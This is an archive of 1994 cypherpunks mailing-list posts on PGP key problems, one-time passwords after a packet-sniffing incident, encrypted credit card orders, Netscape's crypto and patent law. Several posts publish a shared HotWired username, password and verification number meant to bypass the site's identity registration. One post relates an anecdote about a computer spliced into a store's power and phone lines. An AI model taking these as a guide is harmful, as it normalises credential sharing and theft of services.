other keyservers that propagate the bogus key all over (and back to Iowa)? How can one deal with that problem? Key management is one of my _least_ favorite aspects of PGP. grrrrr... 
BTW, my (good) key is available at: ftp.netcom.com:/pub/dd/ddt/crypto/ddt-PGP-key.txt My apologies to anyone who hasn't been able to verify my signatures because of the bogus key. dave _____________________________________________________________ "To solve a maze, start at the cheese and mouse backwards." -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLu5noaHBOF9KrwDlAQHHogP/ds8Nr2nlnR6mRZbul24Kk07FvBrNCqrb TY70MN9aEsKLoALXpdvC4ZIc2npwk3HWK/UN7mayqZsVWwOpJf/NZwATcYHrlGxT 5sHsAhGAzb7TlpByEUJ+He65e7a8doyqffHuUeNdokM5YFkxQi/LRfPVkIDi3cGG jq6NJR20SKs= =+Zfi -----END PGP SIGNATURE----- From ddt at lsd.com Tue Dec 13 21:08:28 1994 From: ddt at lsd.com (ddt at lsd.com) Date: Tue, 13 Dec 94 21:08:28 PST Subject: No Subject Message-ID: X-PGP Key ID: 4AAF00E5 X-PGP Fprint: 30D81F3484E6A83F 6EC8D7F0CAB3D265 Date: Tue, 13 Dec 1994 21:08:19 -0800 To: cypherpunks at toad.com From: ddt at lsd.com (Dave Del Torto) Subject: Re: calling all cpunks on netcom At 11:46 am 12/13/94, Shrieks wrote: >Just floating a trial balloon. Are you tired of the high traffic on >the cypherpunks list Well, yes, it does get a BIT junked-up at times (mea culpa). >and having to wade through a ton of mail every >day? Any of you folks approaching your 5M limit from archiving too >many messages? No, I don't rely on Netcom to store it for me, I POP back it to my home machine and fill the nooks and crannies on my HD before I archive it all to big, monthly searchable text files (which lay compressed at the botton of another drive hanging off my home ether). But that's just me: when I first subscribed in 92 from Budapest (gaak! telecom hell!), I had a very funky and expensive connection and it was a "nagy" pain in the ass. Of course, the volume back then wasn't quite as... "intense." >Well, I am and I don't really want to start paying for the extra memory. I'm sympathetic to that: if there's a better way to do it, I'm all eyes. 
>I was wondering if it might be worth petitioning the netcom sysadmins >to start up a local newsgroup (eg. netcom.cpunks) [elided] As far as trial balloons float, it's not a horrible one, BUT: while I applaud the intent, the method sorta suc-er-(let's see... #10 on Engineer's New Terminology list...from October's FUN10 list ... ah here we go: "WE WILL LOOK INTO IT"(1). Besides the feasibility problems that Timothy mentioned (Netcom bonking files after a while), I'm just convinced that getting Netcom to do somthing this _complex_ would be *UTTERLY IMPOSSIBLE*. I mean, they don't return phone calls, they don't answer support mail (well, almost never), and it took them three-and-a-half-months (yes, you read that correctly) to find the 2 minutes to set up an anon ftp directory for one of my clients (still no explanation for that, btw). Not to mention that certain dept managers there have a tendency to "work around the truth." Now, you tell ME that they can handle something like a local ng (no smirking, now!). Hell, they can't handle the quotidian business they HAVE much less something "technical." Uh, flame off. Yikes. Sorry 'bout that, lads. It's just that I can think of other things I'd prefer to RAM up my butt than more Netcom hassles. Wait a minnit: isn't this alt.netcom.sucks? Oh dear, I wanted the room down the hall. Excuse me. Also, did someone (Tim?) mention that Netcom filters all our packets to the NSA? I'd like to know how anyone could ping that out, but maybe it might be a good idea all the same if we just try to set up our own box overseas. If it could give us a bit more security/fewer intrusions, I'd send the Hack-Tik boys (fer example) in A'dam some fraction of my pathetic bank account to get it up (in the red light district, perhaps, wouldn't _that_ be appropriate?), and/or maybe someone who shall remain nameless with the initials JG might be overcome by philanthropism (yet again) and help us put an old unused box online "somewhere". 
I'm just thrashing here, but maybe there's kernel of a worthwhile idea here (all puns intended, always). What about Arthur Abraham? Arthur? >Another alternative might be to set up something along the lines of >discuss at mit [elided] This might be viable, but sick puppy that I am, I LIKE getting all this mail dumped on my machine from Eric's remailer. I kind of understand Tim's point: with the files local, I can browse/search at will at greater speeds, etc. And ruthless deletion is the only way to survive the onslaught. Of course, this all means I can never go on vacation unless I unsub for the duration, or else I DO get those dorky "your mailbox is full" msgs from you-know-who. s i g h >Just a thought. Pheedback? Screeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-oops, sorry, forgot to turn my radio down. dave [1] Which means: "Forget it! We have enough problems right now." ____________________________________________________________________ "I'm quite confident about the Republicans salvaging the Economy: heck, look what a swell job they're doing down in Orange County!" From adam at bwh.harvard.edu Tue Dec 13 21:12:55 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 13 Dec 94 21:12:55 PST Subject: Emergency! Need single use passwords! In-Reply-To: <9412140329.AA27612@nately.UCSD.EDU> Message-ID: <199412140410.XAA16407@bwh.harvard.edu> | Hi all. We discovered that someone has been | running a packet sniffer on our subnet of several | dozen computers. He has all the passwords. | This is my chance to try to get single use password | login programs installed here. Please give me recomendations | and ftp locations. S/Key is a very nice software only solution (no smart cards). It has clients for Mac, PC, Unix, and supports paper lists as well. Can be configured to only be invoked if the connection is from outside your net. 
ftp.win.tue.nl:/pub/security/logdaemon.tar.Z In quick reply to Derek's suggestion of Kerberos, I will point out that Kerberos does not deal well with remote users. As far as I know, you need a special connection mechanism or your password will travel in the clear to the boundary of your kerberized network. (There is Kerberos support for S/key, there may be telnet programs. There is no paper list or palmtop support.) Adam If you're interested, I can mail you the intro to S/Key sent to our user community. It covers S/key and PGP, since we have users all over the globe. -- "It is seldom that liberty of any kind is lost all at once." -Hume From werewolf at io.org Tue Dec 13 21:34:32 1994 From: werewolf at io.org (Mark Terka) Date: Tue, 13 Dec 94 21:34:32 PST Subject: Encrypted Credit Card Numbers For Transmission.... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I thought about this recently when I bought a subscription to Wired for X-Mas for a friend. Why don't organizations like Wired (who are ostensibly closely connected to the 'net) not have public keys (ie through Viacrypt, as they are a commercial enterprise) that subscription purchasers could encrypt a credit card number to them, and then e-mail that cyphertext file to them for processing. The company could then snail mail to the purchaser confirmation of the cc purchase just like what happens for a credit card phone purchase. It seems straightforward or am I missing something? I mean, PGP is extremely widespread, and other organizations encrypt data for transmission between points with DES, so use of encryption is hardly a novel concept for business to swallow (particularly a magazine like Wired, who likely have a reasonably encryption knowledgeable readership or potential readership).
Routine use of encryption at this simple level would likely get the ball rolling in the direction of other endeavors, like e-cash, or at worst become another convenience for the customer and allow encryption and the 'net to gain wider acceptance. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLu6Cl3BFBj7pSNyhAQGzRQf/WjlkdJaLfTpc8cdDF6EV6IoGN0P0i6l1 dXPMoqRwNn3Aol04pBRQn3+KrK5GaII9ZopRWtEysCzIdv4nbA2t6qLZBZ8oXUgg 3o5Bdp+RIcgXNPtoRmZH5yDGw8kOQqgBH3glWsL25v2BOd87ic10HbhjSZn9FfWD s0qNKFblbqOb6Ur/XZklfjEpPJbE8rvVawt6RQqDO1ky5rKxrgDeGeQVfnu8m7ti fFo9lqTGpBKW9vk8JnTpF5gJvgTcj/iPxNzzeRw6UBD/nIDV2Ttg/lJni5yhGOxe 5LLINeaGVDvtioGbcehz0veXFZ5t7pNJgRxbIIG0AgA+plP0RQdp8A== =iUO3 -----END PGP SIGNATURE----- From cyber1 at io.org Tue Dec 13 21:35:45 1994 From: cyber1 at io.org (Cyber City) Date: Tue, 13 Dec 94 21:35:45 PST Subject: Emergency! Need single use passwords! In-Reply-To: <9412140329.AA27612@nately.UCSD.EDU> Message-ID: On Tue, 13 Dec 1994, Lance Cottrell wrote: > This is my chance to try to get single use password > login programs installed here. Please give me recomendations > and ftp locations. ftp://thumper.bellcore.com/pub/nmh/skey From lcottrell at popmail.ucsd.edu Tue Dec 13 22:11:57 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Tue, 13 Dec 94 22:11:57 PST Subject: Emergency! Need single use passwords! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >| Hi all. We discovered that someone has been >| running a packet sniffer on our subnet of several >| dozen computers. He has all the passwords. >| This is my chance to try to get single use password >| login programs installed here. Please give me recomendations >| and ftp locations. > > S/Key is a very nice software only solution (no smart cards). >It has clients for Mac, PC, Unix, and supports paper lists as well. >Can be configured to only be invoked if the connection is from outside >your net. 
ftp.win.tue.nl:/pub/security/logdaemon.tar.Z > > In quick reply to Derek's suggestion of Kerberos, I will point >out that Kerberos does not deal well with remote users. As far as I >know, you need a special connection mechanism or your password will >travel in the clear to the boundary of your kerberized network. (There >is Kerberos support for S/key, there may be telnet programs. There is >no paper list or palmtop support.) > >Adam > > If you're interested, I can mail you the intro to S/Key sent >to our user community. It covers S/key and PGP, since we have users >all over the globe. > >-- >"It is seldom that liberty of any kind is lost all at once." > -Hume Wonderful, thanks. That is exactly what I was looking for. I forgot the name of the program. BTW, remailer at nately and mixmaster at nately will be down till tomorrow morning because we yanked the thicknet connection out of our Ethernet repeater. Let's see a hacker get through THAT security ;) No messages will be lost. They should be back up around 11:00 AM PST tomorrow. To spare you other remailer operators out there a flood of messages, I turned off my pinging scripts ;) -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu6LblVkk3dax7hlAQHq6gP+NnwclSRJ9b9G5qV9qsfE/1MH0o+K+vcq 2JNRgPgPhdo9CrBO+c65KnVXXse8k6wiAY2vcwJdN/01c4SmqoHnrAU0n7Zpoyxx v3uilFCBIOLw4jtwBPq8ipspYDJior5q86Shhc1Cy66iPyU67DOiXMDssucBGLaU w3rgkImkCHU= =jZ6r -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche

From lmccarth at ducie.cs.umass.edu Tue Dec 13 22:29:46 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 13 Dec 94 22:29:46 PST
Subject: Encrypted Credit Card Numbers For Transmission....
In-Reply-To:
Message-ID: <199412140630.BAA28049@ducie.cs.umass.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Mark Terka writes:
> Why don't organizations like Wired (who are ostensibly closely connected to
> the 'net) not have public keys (ie through Viacrypt, as they are a commercial
> enterprise) that subscription purchasers could encrypt a credit card number
> to them, and then e-mail that cyphertext file to them for processing.

Some do; see for example http://northpole.net/buttons.html (as noted by Hal Finney previously).

> [...] use of encryption is hardly a novel concept for business
> to swallow (particularly a magazine like Wired, who likely have a reasonably
> encryption knowledgeable readership or potential readership).

Wired is tired. Someone should call them on this.

Incidentally, I just tried to get into HotWired using the "cypherpunks"/"cypherpunks" combo I recommended to Amanda earlier this evening. It didn't work. I'm just about to re-register cypherpunks on it, so don't be surprised to see a verification key sent to the list soon. I'll summarize to the list once the new membership seems ready to go.

- -L. Futplex McCarthy
"Your registration [...] encourages responsible behavior and good citizenship by discouraging anonymity." --Hotwired, on http://www.hotwired.com/newform.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From newaccounts at wired.com Tue Dec 13 22:31:45 1994
From: newaccounts at wired.com (newaccounts at wired.com)
Date: Tue, 13 Dec 94 22:31:45 PST
Subject: Welcome to HotWired!
Message-ID: <199412140636.BAA14207@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Welcome to HotWired!
++++++++++++++++++++

The verification number for "cypherpunks" is: 96472

You may also use the following URL to verify yourself, using cut and paste if you can:

http://hard.wired.com/cgi-bin/users/ver?number=96472

Note: This is your *verification* number, *not* your HotWired password. Your HotWired password is the password you gave us when you created your account, and has not changed (and won't change unless you change it).

Please type (or copy and paste) this number into the verification form. To reach the verification form, connect to HotWired, click Yes to signify that you are a member, and click on the region of the image map that reads, "You should verify NOW." (You really should.) You can also reach this directly as

http://www.hotwired.com/Login/verify.html

You will then be able to take advantage of the full range of HotWired services.

Thanks!

- ----------------------------------------------------------------------

HotWired FAQ

What Is HotWired?

HotWired is new thinking for a new medium. We call it a cyberstation, a suite of vertical content streams about the Digital Revolution and the Second Renaissance with an integrated community space. While HotWired is currently bound by technological limitations that restrict bandwidth, it represents the genetic blueprint that will evolve into the overarching media environment of the next century.

At the core of HotWired's editorial is point of view. We are not in the content business, we are in the context business. People today don't have the time or inclination to make sense of the data flood. HotWired is Wired's answer to the need for professionalism in a new medium that has been filled until now with something that resembles public access television programming. HotWired is live, twitching, the real-time nervous system of the planet.

What Does HotWired Look Like?
HotWired is a stunning reinterpretation of the World Wide Web. Developed by Creative Director Barbara Kuhr of the award-winning design firm Plunkett + Kuhr, HotWired's look is clean and bright, filled with playful logos by Dutch designer Max Kisman and bursting with world-beat colors.

HotWired can be accessed on the Internet via the World Wide Web and a client application such as Mosaic or NetScape (though be warned, NCSA Mosaic for Windows has a bug which makes it unusable).

How Is HotWired Different?

HotWired doesn't look like any online service out there - it zigs where all the others zag. (HotWired's unofficial design watchword was "war on bevelled edges.") Its content and perspective are as innovative as those of its mothership, Wired magazine, while at the same time being utterly different. Its community space is technologically unrivalled - the first graphical conferencing system for the World Wide Web.

Isn't Advertising Anathema on the Net?

The Net community does indeed react negatively to invasive advertising - the kind of spamming conducted recently by the Arizona lawyers Canter and Siegel, which elicited a massive rejection by the Net's immune system. The advertising on HotWired is the opposite of invasive. Each advertiser is accessible only through a single discreet banner at the head of a content section. Most advertising is 90 percent persuasion and 10 percent information; advertising on HotWired reverses this ratio. And the privacy of members is guaranteed by HotWired's unqualified commitment to never divulge a member's personal information to advertisers.

Why HotWired, Why Now?

Because while Big Media and the telecom behemoths have been busy forming "strategic alliances" to build the "information superhighway" and sending out press releases about the tests they're launching any day now, thousands of companies and millions of people have quietly built a new interactive medium called the Internet.
This medium is not magazines with buttons, any more than television was radio with pictures. It's a new medium with a new aesthetic, a new commercial dynamic.

Many media companies shovel their leftovers into the online world and call it content. HotWired is not one of them. Where Wired is a clear signpost to the next level, HotWired is operating from that next level.

HotWired is a constantly evolving experiment in virtual community. It's Way New Journalism. It's Rational Geographic.

Today is like 1948; a new medium has reached critical mass. We're trying to help define the future of that medium before it ends up like television. So if you're looking for the soul of our new medium in wild metamorphosis, our advice is simple. Get HotWired.

What Does HotWired Cost?

HotWired is free to members. HotWired's revenue model is similar to broadcast media - content supported by sponsors. HotWired's sponsors are some of the bluest chip advertisers in America, including IBM, AT&T, Volvo, Sprint, MCI, Zima (Coors), Internet Shopping Network (Home Shopping Network), Club Med, etc.

What Hotwired Is Not

HotWired is not Wired magazine with another name (Wired works perfectly well in print, thank you). It's not a so-called online magazine (print content reduced to ASCII and shoveled into another medium, narrowband interactive). It's not video-on-demand (a pie-in-the-sky marketing concept created by out-of-touch old-media executives to justify their headlong rush into a new medium they don't understand, broadband interactive). It's not an online service like Prodigy or AOL (now rendered obsolete by the explosion of interest in the Internet and the development of the Web and graphical browsers). And like Wired before it, HotWired is not a cold, marketing concept, but the heartfelt expression of the passion of its creators.

- ---

[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Tue Dec 13 22:54:32 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 13 Dec 94 22:54:32 PST
Subject: C'punks HotWired Account
In-Reply-To: <199412140636.BAA14207@bb.hks.net>
Message-ID: <199412140655.BAA28147@ducie.cs.umass.edu>

-----BEGIN PGP SIGNED MESSAGE-----

newaccounts at wired.com writes:
> Welcome to HotWired!
> ++++++++++++++++++++
> The verification number for "cypherpunks" is: 96472

I have successfully verified this registration with the HotWired server. To access HotWired, you can use
username: cypherpunks
password: cypherpunks

Enjoy !

> [...] bursting with world-beat colors.

What are world-beat colors, and how can I get them on my monochrome monitor ?

- -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Tue Dec 13 22:58:42 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 13 Dec 94 22:58:42 PST
Subject: Encrypted Credit Card Numbers For Transmission....
Message-ID: <199412140658.WAA18184@jobe.shell.portal.com>

From: "L. McCarthy"
> Incidentally, I just tried to get into HotWired using the "cypherpunks"/
> "cypherpunks" combo I recommended to Amanda earlier this evening. It didn't
> work.
I'm just about to re-register cypherpunks on it, so don't be surprised
> to see a verification key sent to the list soon. I'll summarize to the list
> once the new membership seems ready to go.

It was "cypherpunk"/"cypherpunk", no "s". But that's OK, it doesn't hurt to have both.

Hal

From sdw at lig.net Tue Dec 13 23:35:30 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Tue, 13 Dec 94 23:35:30 PST
Subject: BofA + Netscape
In-Reply-To: <9412131845.AA12626@snark.imsi.com>
Message-ID:

...
> Imagine if someone proposed Bass-O-Matic today, however. Well, we have
> better technologies than SSL today -- IMPLEMENTED AND AVAILABLE -- so
> they aren't pioneering -- they are going retrograde.
>
> Perry

It's too bad that Mosaic used Motif. If it hadn't I think we would have seen continued development by the rest of the community.

I'm going to make a point to see how far the tcl/tk folks got with their www browser and see if pgp could be grafted onto it. (Or something along those lines.)

Any interested collaborators?

Note that part of the reason I'm interested is that it looked like there would eventually be a Windows tk version, which would be fantastic. (Just looked: there is a version available for windows, but not sure if winsock support is there yet. Also, lots of widgets would need to be included in the executable to make it feasible.)

Is there an obvious reason that pgp's normal message encoding method couldn't be used as the encryption/authentication technique?

sdw

-- Stephen D.
Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw
Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From pierre at shell.portal.com Wed Dec 14 01:35:45 1994
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Wed, 14 Dec 94 01:35:45 PST
Subject: expendable computer sites
Message-ID: <199412140935.BAA26307@jobe.shell.portal.com>

Related to our earlier discussions about expendable computer sites:

A quote from the article: The Ghost Board, by Autolycus, in 2600, v10, n3, autumn 1994, p11

"For a short period of time in the early 90's, one Ghost Board pioneer abandoned an AT (he'd purchased it for $40 at the Goodwill) on the roof of a rural supermarket. The AT was water-protected and hardwired into the store's power grid and the 2400 modem was spliced into the store's phone lines. This system operated for almost five months before it was (apparently) detected and shut down."

(The rest of the article is anecdotes about hiding BBS's inside other BBS's.)

Pierre.
pierre at shell.portal.com

From an107744 at anon.penet.fi Wed Dec 14 04:10:57 1994
From: an107744 at anon.penet.fi (Big Lama)
Date: Wed, 14 Dec 94 04:10:57 PST
Subject: News->Mail & CMU's Andrew Message System
Message-ID: <9412141142.AA29687@anon.penet.fi>

> > AMS is pretty strongly tied to AFS (now known as part of DCE)
>
> At some levels DCE's distributed file system (DFS) is "AFS version 5" (sic),
> but not really. The original intent was that DFS was AFS with the IPC replaced
> with secure DCE RPC, but there's a whole mess of protocol changes since then.

A, B, C and D and E and AMS and AFS and DCE and DFS and IPC and RPC and MDA and STP and LSD and THC...

...and amphetamine.
Big Lama (remembering an old hit, from the Flower Power period)

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin at anon.penet.fi.

From snyderra at dunx1.ocs.drexel.edu Wed Dec 14 04:17:33 1994
From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder)
Date: Wed, 14 Dec 94 04:17:33 PST
Subject: THROUGH THE LOOKING GLASS
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 8:44 AM 12/13/94, Sandy Sandfort wrote:

>Police are public officials. As such, they have no right to
>privacy *with respect to their public acts*. When off duty, cops
>have the same right as other citizens to privacy in their private
>lives. I said my proposal was "anti- *bad* cop" and that it
>would benefit good cops. Do I need to say that it would only
>benefit good cops in the line of duty? It would be bad for
>anyone--cops or civilians--in their private lives.
>
>Employees represent an intermediate position. If an employer is
>foolish enough to require that employees be wired, 'sokay with
>me. For most employees in most jobs, it would not be acceptable.
>I think they would get jobs with less intrusive employers. Some
>employers will wire some employees, whether or not the police are
>wired. Wiring the cops is a good idea; arguments about wiring
>employees and citizens are nothing more than red herrings used to
>avoid addressing the real issue of police accountability.

Arguably discussions about police abuses are red herrings used to avoid addressing the real issue of workplace monitoring. :-)

I really don't want to know how many sips it takes an officer to finish a cup of coffee, or if the officer has a genital itch problem while sitting in a speed trap. I think this crosses the line.
And where do we stop? Do we wire other federal employees? Does the secretary for a research group in the FDA need to be wired? It would be a short jump from this to private sector use, which I do oppose. Not everyone has the ability to pick and choose employment.

This has wandered a bit off of Cryptological relevance. I don't plan to reply publicly to this thread anymore, although I may do so privately.

Bob

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--
Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted
snyderra at post.drexel.edu PGP & RIPEM keys on key servers
When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl.

From snyderra at dunx1.ocs.drexel.edu Wed Dec 14 04:17:39 1994
From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder)
Date: Wed, 14 Dec 94 04:17:39 PST
Subject: BofA+Netscape
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 4:18 PM 12/13/94, Jim McCoy wrote:

>> The plug for crypto that they have placed in Netscape 0.96 is
>> the number one force bringing crypto awareness to the masses.
>
>Increasing use of PGP is the number one force bringing crypto awareness to
>the masses, Netscape is just bringing bad crypto to the masses.

No. I could see the argument that PGP is bringing crypto to the masses. I can't see it bring crypto-awareness to the masses. In order to find and use PGP, you have to already be concerned about privacy and cryptography. Netscape, on the other hand, by popping up the alert that this traffic isn't being encrypted, and may be eavesdropped, is and will get the common folk to think about data security and confidentiality. A lot more people will probably use Netscape than PGP, and the people who use Netscape are the people to whom the wonders of encryption need to be shown.
As to whether Netscape's crypto is good or bad, I'll leave that to the chest-pounding "IETF is life. IPSP should be all you need to be happy" folk. Personally, I'd prefer a standards based scheme, and it looks like the NCC folk are looking that way, despite the unwarranted abuse they are getting.

>No, the correct response is to stop idiotic measures before they build up
>enough inertia behind them to make it difficult to prevent mistakes from
>being made. It is interesting that the creators of Netscape quite
>frequently harp on "it is us against the goliath of Microsoft, so we
>deserve the support of the net" and then they go out and do exactly the
>sort of thing that makes Microsoft so unpopular; they take advantage of
>their market position to force bad technology on others.

They've said they are investigating it. They are here, and they are listening, and looking into it. What do you want of them?

Bob

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--
Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted
snyderra at post.drexel.edu PGP & RIPEM keys on key servers
When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl.

From snyderra at dunx1.ocs.drexel.edu Wed Dec 14 04:18:38 1994
From: snyderra at dunx1.ocs.drexel.edu (Bob Snyder)
Date: Wed, 14 Dec 94 04:18:38 PST
Subject: Emergency! Need single use passwords!
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

At 7:29 PM 12/13/94, Lance Cottrell wrote:

>Hi all. We discovered that someone has been
>running a packet sniffer on our subnet of several
>dozen computers. He has all the passwords.
>This is my chance to try to get single use password
>login programs installed here. Please give me recommendations
>and ftp locations.
You might also want to check out the firewall toolkit, which contains parts to secure a system, including special shells that work with S/Key or SecureNet Key hardware keys (use DES challenge/response). ftp.tis.com.

Bob

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

--
Bob Snyder N2KGO MIME, PGP, RIPEM mail accepted
snyderra at post.drexel.edu PGP & RIPEM keys on key servers
When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl.

From zimm at alumni.caltech.edu Wed Dec 14 04:50:53 1994
From: zimm at alumni.caltech.edu (Mark Edward Zimmerman)
Date: Wed, 14 Dec 94 04:50:53 PST
Subject: Articles on Adelman and E=mc(2)
In-Reply-To: <199412131550.KAA23154@pipe3.pipeline.com>
Message-ID: <199412141250.EAA13389@alumni.caltech.edu>

re Hal Puthoff et al.'s "unconventional" theories on the nature of matter, tnx for pointer to article, but a caveat: they are very probably wrong, as are virtually all such attempts to overturn big chunks of physics. Does the article mention that Hal is most famous for his SRI work on remote viewing & spoonbender/magician Uri Geller some years ago? That doesn't disprove his current notions (and I've tried to read some of his technical papers, which he occasionally gets published in mainstream peer-reviewed physics journals, but I don't have the time or talent to poke holes in them; my Ph.D. is in astrophysics and general relativity) but perhaps raises some questions, if you're a skeptic by nature....

To give this msg a wee bit of crypto content, any news on the "quantum cryptography" front?
Although that subject does seem to me to be legitimate physics, my current perception is that it's almost entirely an intellectual exercise, and that the proposed applications (key-distribution or the like) are contrived examples without plausible real-world use (and with many security holes to boot). Am I wrong?

Best, ^z (Mark "no relation" Zimmermann)

From avi at clas.ufl.edu Wed Dec 14 05:58:40 1994
From: avi at clas.ufl.edu (Avi Harris Baumstein)
Date: Wed, 14 Dec 94 05:58:40 PST
Subject: Using HotWIRED without provoking junk mail
In-Reply-To: <199412140456.XAA12500@bb.hks.net>
Message-ID: <199412141358.IAA28880@cutter.clas.ufl.edu>

"L. McCarthy" writes:

>A while back someone established a HotWIRED account in the name "cypherpunks"
>with password "cypherpunks" to get around this. I make a point of mentioning

funny thing about that. i told a non-cp friend about this when he first discovered hotwired's policy. he used it for a while, and then somehow mentioned it on another list (something to do with publishing), in a discussion with one of wired's folk. she (wired person) later made the comment that she looked it up, and halfway through that day there were over 100 hits to that account already.

tells us three things:

-at least this wired staffer was somewhat amused with the prospect (rather than annoyed, as i had expected).

-they have a fairly simple way of checking up on usage, by account, by day. which means they are probably using this data for something already.

-the account is well used.

-avi

From avi at clas.ufl.edu Wed Dec 14 06:09:15 1994
From: avi at clas.ufl.edu (Avi Harris Baumstein)
Date: Wed, 14 Dec 94 06:09:15 PST
Subject: Encrypted Credit Card Numbers For Transmission....
In-Reply-To: <199412140630.BAA28049@ducie.cs.umass.edu>
Message-ID: <199412141409.JAA29088@cutter.clas.ufl.edu>

"L. McCarthy" writes:

>Incidentally, I just tried to get into HotWired using the "cypherpunks"/
>"cypherpunks" combo I recommended to Amanda earlier this evening.
It didn't
>work. I'm just about to re-register cypherpunks on it, so don't be surprised

the account i have been using all along is 'cypherpunk' / 'cypherpunk'. still works. i made the mistake of trying 'cypherpunks' a few times until i went back and read my mail. but since it's such a natural mistake, i doubt having both is any detriment.

-avi

From a.brown at nexor.co.uk Wed Dec 14 06:11:39 1994
From: a.brown at nexor.co.uk (Andy Brown)
Date: Wed, 14 Dec 94 06:11:39 PST
Subject: Legal implications of a PGP DLL
In-Reply-To: <9412140032.AA25902@homer.spry.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 13 Dec 1994 bshantz at spry.com wrote:

> I know this has been hashed over recently, but I never found out (or don't
> remember) what was decided in regards to the legal implications of a PGP
> functional DLL for Windows. If a company (i.e. SPRY, wink, wink, nudge,
> nudge.) were to write a PGP DLL and make it publicly available, would that be
> legal?

Can't see any reason why not. The PGP code is freely redistributable, it's what the recipients do with the patented parts of it that will matter. e.g. use of the IDEA code in a commercial environment will require the users to obtain a licence.

- - Andy

+-------------------------------------------------------------------------+
| Andrew Brown Internet Telephone +44 115 952 0585 |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 |
+-------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From eric at remailer.net Wed Dec 14 06:41:38 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 06:41:38 PST
Subject: Legal implications of a PGP DLL
In-Reply-To: <9412140032.AA25902@homer.spry.com>
Message-ID: <199412141539.HAA04071@largo.remailer.net>

From: bshantz at spry.com [..]
I never found out [...] what was decided in regards to the legal implications of a PGP functional DLL for Windows.

If a PGP DLL were rewritten from scratch and placed in the public domain the only concern would be patent licensure. By rewriting, you've removed any sort of copyright issue.

The only way you'd get an RSA license is to use RSAREF. That means that use of the DLL would be restricted to non-commercial use. You'd also need an IDEA license, but I suspect that if you're just doing something PGP compatible you'd be able to obtain that, especially since it would be non-commercial because of RSAREF.

If you need commercial accessibility, you'd need licenses from RSADSI and Ascom-Tech. You could then give the DLL away, but RSADSI wants minimum royalties, so you'd be subsidizing the public. I don't know the situation with Ascom.

Eric

From eric at remailer.net Wed Dec 14 06:55:21 1994
From: eric at remailer.net (Eric Hughes)
Date: Wed, 14 Dec 94 06:55:21 PST
Subject: Elliptic crypto is patented
In-Reply-To:
Message-ID: <199412141552.HAA04089@largo.remailer.net>

From: rishab at dxm.ernet.in

Incidentally Next Computer's Fast Elliptic Encryption, FEE, used elliptic curves, and is patented (by R E Crandell, USP# 5,159,632,27 October 1992);

Does anybody have a copy of this to see exactly what is claimed?

elliptic crypto is probably covered by the DH/PKP patents.

If you believe RSADSI it is. Now, are they going to say otherwise?

The fact of the matter is, you can't patent ideas, nor general characteristics of devices. You can patent particular processes or mechanisms for particular purposes. If you come up with a different process or mechanism, the patent does not cover it. If you come up with a different purpose (!), the patent does not hold.

The limitation to this difference is the doctrine of extension. A patent covers not only the particular thing patented but also things substantially similar to it. This is to prevent trivial changes from remaining unprotected.
